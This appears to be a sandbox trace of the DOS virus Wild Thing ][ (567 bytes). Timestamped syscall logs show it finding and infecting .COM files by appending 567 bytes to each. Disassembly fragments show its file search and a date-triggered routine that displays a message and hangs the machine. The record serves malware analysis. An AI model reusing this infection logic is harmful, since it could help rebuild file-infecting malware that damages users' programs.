Sample viewer

vx.netlux.org/Virus.DOS.WildThing.567

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:04:31.365833571Z 26 PC: 12c51 | Set disk transfer address
2018-12-17T23:04:31.367676541Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-17T23:04:31.370366084Z 71 PC: 12b22 | Get current directory
2018-12-17T23:04:31.373457124Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-17T23:04:31.376693646Z 78 PC: 12c42 | Find first file
2018-12-17T23:04:31.381809827Z 78 PC: 12b33 | Find first file
2018-12-17T23:04:31.385687715Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:31.391103457Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:31.417954596Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:04:31.444007311Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:31.446079071Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:31.454105757Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.455823691Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:31.467260972Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.48425198Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:31.492902827Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:31.505612119Z 62 PC: 12bfc | Close file
2018-12-17T23:04:31.514106324Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:31.524937257Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:31.527657254Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:31.535646935Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:31.545501609Z 61 PC: 12b90 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:04:31.55711162Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:31.559365304Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:31.565644915Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.567034029Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:31.570640113Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.572492379Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:31.58074401Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:31.582533323Z 62 PC: 12bfc | Close file
2018-12-17T23:04:31.590717903Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:31.601152879Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:31.604171573Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:31.625804821Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:31.645614168Z 61 PC: 12b90 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:04:31.65240725Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:31.655007478Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:31.661448036Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.663109435Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:31.666593432Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.668103821Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:31.676346102Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:31.678907019Z 62 PC: 12bfc | Close file
2018-12-17T23:04:31.687521401Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:31.697216858Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:31.700509943Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:31.70634257Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:31.71640121Z 61 PC: 12b90 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:04:31.728154082Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:31.729950644Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:31.736692132Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.739758653Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:31.743010297Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.745272689Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:31.754109928Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:31.756917512Z 62 PC: 12bfc | Close file
2018-12-17T23:04:31.764743743Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:31.774728228Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:31.77867404Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:31.784315546Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:31.794213096Z 61 PC: 12b90 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:04:31.801841118Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:31.80385521Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:31.810301823Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.812736559Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:31.815946053Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:31.817905294Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:32.274146399Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:32.276484305Z 62 PC: 12bfc | Close file
2018-12-17T23:04:32.296359639Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:32.31707612Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:32.321335825Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:32.327126932Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:32.343756092Z 61 PC: 12b90 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:04:32.358185165Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:32.360061214Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:32.366994597Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:32.369696521Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:32.372508168Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:32.374578726Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:32.391412226Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:32.393470894Z 62 PC: 12bfc | Close file
2018-12-17T23:04:32.417189589Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:32.43840522Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:32.442337309Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:32.448551925Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:32.469937177Z 61 PC: 12b90 | Open file (Filename = 'PAH.COM')
2018-12-17T23:04:32.477562508Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:32.479339583Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:32.487470483Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:32.489844795Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:04:32.492974146Z 66 PC: 12c12 | Move file pointer
2018-12-17T23:04:32.495734389Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-17T23:04:32.515060157Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:32.516959835Z 62 PC: 12bfc | Close file
2018-12-17T23:04:32.536202707Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:32.578592751Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:32.581778185Z 67 PC: 12b7b | Get or set file attributes
2018-12-17T23:04:32.590853369Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T23:04:32.624398262Z 61 PC: 12b90 | Open file (Filename = 'TEST.COM')
2018-12-17T23:04:32.632841301Z 87 PC: 12b98 | Get or set file date and time
2018-12-17T23:04:32.634773195Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:04:32.642781621Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:04:32.644532311Z 62 PC: 12bfc | Close file
2018-12-17T23:04:32.677133796Z 67 PC: 12c07 | Get or set file attributes
2018-12-17T23:04:32.726042542Z 79 PC: 12b33 | Find next file
2018-12-17T23:04:32.728464707Z 59 PC: 12b48 | Change current directory
2018-12-17T23:04:32.731773954Z 59 PC: 12b52 | Change current directory
2018-12-17T23:04:32.735263683Z 26 PC: 12c51 | Set disk transfer address
2018-12-17T23:04:32.737512511Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-17T23:04:32.743355533Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:04.670951438Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:04.672544519Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:04.674690341Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:04.677530232Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:04.680842348Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:04.686828776Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:04.698053628Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:04.70949584Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:04.738639335Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:04.745525449Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:04.747428507Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:04.763466914Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:04.764982744Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:04.767718811Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.770303054Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:04.779682292Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:04.781442862Z 62 PC: 12bfc | Close file
2018-12-25T12:42:04.789753502Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:04.799675941Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:04.802544759Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:04.808886375Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:04.818901424Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:04.830318131Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:04.832524447Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:04.839430532Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.841053087Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:04.845030128Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.846988428Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:04.858621893Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:04.86104418Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:04.868748479Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:04.878434963Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:04.881975368Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:04.887546664Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:04.897128253Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:04.909118441Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:04.910637006Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:04.917083418Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.919029908Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:04.921760767Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.923613901Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:04.932064064Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:04.933995636Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:04.942193613Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:04.952097179Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:04.955912659Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:04.961679736Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:04.97182661Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:04.97953828Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:04.9811369Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:04.990354812Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.992897847Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:04.996071635Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:04.997963402Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.00685019Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.008811918Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.016544212Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.027013834Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.030522473Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.036864527Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.046641316Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.054206163Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.055781011Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.062201581Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.064137447Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.066973307Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.068841146Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.077629672Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.078983057Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.08652282Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.097571535Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.1002811Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.106422989Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.116830299Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.123727823Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.125234203Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.132321936Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.134084435Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.136831985Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.139342783Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.148442295Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.150056384Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.157889839Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.168773557Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.171484239Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.177157842Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.188123105Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.194729203Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.196232582Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.20358077Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.205090442Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.207817649Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.210541255Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.218722975Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.220341866Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.229156515Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.239127731Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.241905304Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.248079512Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.257731356Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.264372904Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.26646339Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.272749045Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.27438337Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.284138375Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.296627096Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.299152073Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:05.304070595Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:05.306312989Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:05.307591325Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:07.502888185Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:07.505281521Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:07.507814197Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:07.511742133Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:07.522657002Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:07.524765671Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:07.527292275Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:07.54371798Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:07.545243428Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:07.549623401Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:07.554091668Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:07.556736159Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:07.559136777Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:07.563806258Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:07.568344462Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:07.573106447Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:07.584341522Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:07.58601363Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:07.588298018Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:07.609249876Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:07.613619408Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:07.615231923Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:07.617334974Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:07.618648375Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:07.620370389Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:07.62211274Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:07.630149115Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:07.632881097Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:07.635909263Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.639846237Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.641563331Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.643459324Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.645948829Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.647617993Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.649107492Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.65210435Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.65377618Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.655472809Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.658101356Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.659782701Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.661467093Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.664115926Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.665815481Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.667484645Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.67009241Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.674159141Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.675524063Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.677665308Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.679033754Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.6803524Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.682710855Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.684052734Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.685482677Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.687898716Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.689242197Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.69063791Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.692886875Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:07.694223159Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:07.698820354Z 62 PC: 8f90e | Close file
2018-12-25T12:42:07.700677104Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:07.703922279Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:07.705464787Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:07.709875481Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:07.711724538Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:07.717528443Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:07.719325079Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:07.721572363Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:07.723118198Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:07.724471715Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:07.727231977Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:07.729016946Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:07.730535004Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:07.733180216Z 73 PC: 8efea | Release memory
2018-12-25T12:42:07.734375826Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:07.735815806Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:07.738896352Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:07.740564719Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:07.742143346Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:07.751475353Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:07.757049966Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:07.758689167Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:07.761855183Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:07.783824447Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:07.785133915Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:07.787190471Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:07.79007226Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:07.791429631Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:07.793598218Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:07.7950172Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:07.796537618Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:07.798078242Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:07.800599611Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:07.806348824Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:07.812686174Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:07.81631509Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:07.817848439Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:07.81928215Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:07.820532837Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:07.823477713Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:07.824534994Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:07.825956109Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:07.827965417Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:07.829337474Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:07.831422045Z 72 PC: 130ec | Allocate memory
